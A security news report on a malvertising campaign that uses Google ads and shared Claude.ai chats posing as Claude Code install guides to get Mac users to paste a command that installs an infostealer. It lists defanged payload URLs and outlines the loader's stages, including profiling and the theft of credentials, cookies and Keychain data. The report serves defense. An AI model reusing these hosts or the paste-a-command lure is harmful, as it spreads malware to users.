Uncovering the Dark Side of Digital Marketing: How Hackers Exploit Google Ads and Claude.ai Chats to Spread Mac Malware

Google Ads and legitimate Claude.ai shared chats are being exploited by attackers in an ongoing malvertising campaign.

Individuals searching for “Claude mac download” may encounter sponsored search results that feature claude.ai as the intended website, but actually lead to instructions that install malware on their Mac computers.

Malicious Use of Shared Claude Chats to Target macOS Users

A security engineer at Trendyol Group, Berk Albayrak, discovered the campaign and shared his observations on LinkedIn.

Albayrak identified a shared Claude.ai chat masquerading as an official “Claude Code on Mac” installation guide, supposedly from “Apple Support.”

The chat instructs users to open Terminal and paste a command, which consequently downloads and executes malware on their Mac systems.

While verifying Albayrak’s discovery, BleepingComputer encountered a second shared Claude chat executing the same attack using separate infrastructure.

Both chats follow a similar pattern and approach but employ different domains and payloads. Both chats were publicly accessible at the time of review.

Functionality of macOS Malware

The base64 instructions displayed in the shared Claude chat fetch an encoded shell script from domains such as:

• In the variant observed by Albayrak [VirusTotal]: hxxp://customroofingcontractors[.]com/curl/b42a0ed9d1ecb72e42d6034502c304845d98805481d99cea4e259359f9ab206e
• In the variant observed by BleepingComputer [VirusTotal]: hxxps://bernasibutuwqu2[.]com/debug/loader.sh?build=a39427f9d5bfda11277f1a58c89b7c2d

The ‘loader.sh’ (served by the second link above) contains another set of Gunzip-compressed shell instructions:

This compressed shell script operates solely in memory, leaving minimal traces on the disk.

The server was observed delivering a uniquely obfuscated version of the payload upon each request, utilizing polymorphic delivery to evade detection based on known hashes or signatures.

The variant identified by BleepingComputer initially checks for Russian or CIS-region keyboard input sources. If detected, the script terminates without action, sending a discreet cis_blocked status ping to the attacker’s server. Only machines passing this check proceed to the next stage:

Prior to advancing, the script gathers the victim’s external IP address, hostname, OS version, and keyboard locale, transmitting this data to the attacker. This form of victim profiling before payload delivery indicates targeted operations.

The script proceeds to retrieve a second-stage payload and execute it using osascript, macOS’s built-in scripting engine, granting the attacker remote code execution without deploying a conventional application or binary.

However, Albayrak’s identified variant appears to skip the profiling phase and immediately initiates execution.

It harvests browser credentials, cookies, and macOS Keychain contents, compiles them, and transmits them to the attacker’s server. Albayrak recognized this as a variation of the MacSync macOS infostealer:

The briskinternet[.]com domain mentioned above in Albayrak’s variant seemed inactive at the time of review.

Legitimate URLs as Threat Vectors

Malvertising has emerged as a common channel for malware distribution.

Previous reports by BleepingComputer highlighted comparable campaigns targeting individuals seeking software like GIMP, where a convincing Google ad led to a legitimate-looking domain redirecting visitors to a phishing site.

This campaign, however, differs as it lacks a fake domain. The Google ads direct users to Anthropic’s authentic domain, claude.ai, as the attackers leverage Claude’s shared chat feature for malicious instructions. The link in the ad is genuine.

This method of abusing AI platform shared chats is not unprecedented. BleepingComputer previously covered a similar campaign aimed at ChatGPT and Grok users.

It is advisable for users to visit claude.ai directly to download the official Claude app instead of clicking on sponsored search results. The authentic Claude Code CLI can be obtained through Anthropic’s official documentation without the need to paste commands from a chat interface.

Exercise caution when following instructions that involve pasting terminal commands, irrespective of their apparent source.

Prior to publication, BleepingComputer contacted Anthropic and Google for comments.